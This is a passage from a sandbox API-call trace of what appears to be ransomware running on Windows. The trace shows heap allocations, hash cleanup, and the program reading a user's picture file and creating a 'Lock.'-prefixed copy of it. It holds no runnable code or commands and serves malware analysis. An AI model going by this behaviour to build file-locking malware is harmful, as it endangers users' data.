wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0211.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0211.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0211.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0211.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0211.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0211.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0211.065] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.065] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0211.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0211.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0211.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0211.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0211.066] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.066] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0211.066] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0211.066] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0211.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11) returned 0x29f6f40 [0211.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f40, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0211.066] CryptDestroyHash (hHash=0x9e1db8) returned 1 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0211.066] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0211.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0211.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0211.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0211.067] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0211.067] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.067] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.067] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0211.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0211.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.068] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Oj8L14m5Ftw_q T.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\oj8l14m5ftw_q t.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0211.069] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.069] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0211.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0211.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.069] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0211.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0211.069] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0211.069] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0211.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0211.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0211.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0211.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0211.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a73c50 [0211.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.070] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0211.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73c50 | out: hHeap=0x2af0000) returned 1 [0211.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0211.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a938 [0211.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0211.071] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.Oj8L14m5Ftw_q T.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.oj8l14m5ftw_q t.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0211.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ea0 [0211.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.072] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0211.072] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0211.072] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0211.072] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0211.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0211.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0211.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0211.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0211.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0211.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e2020 [0211.076] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0211.076] ReadFile (in: hFile=0x520, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x115b, lpOverlapped=0x0) returned 1 [0211.077] ReadFile (in: hFile=0x520, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0211.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x115b) returned 0x2a9a940 [0211.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e2020 | out: hHeap=0x2af0000) returned 1 [0211.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0211.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x115b) returned 0x2a9baa8 [0211.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a940 | out: hHeap=0x2af0000) returned 1 [0211.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.081] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0211.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0211.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x115b) returned 0x2a9a940 [0211.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a940 | out: hHeap=0x2af0000) returned 1 [0211.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.081] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0211.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0211.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0211.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0211.081] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0211.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0211.081] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0211.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0211.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a78 [0211.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0211.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0211.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x115b) returned 0x2a9a940 [0211.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b28 [0211.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0211.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b48 [0211.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0211.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b58 [0211.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.082] RtlAllocateHeap 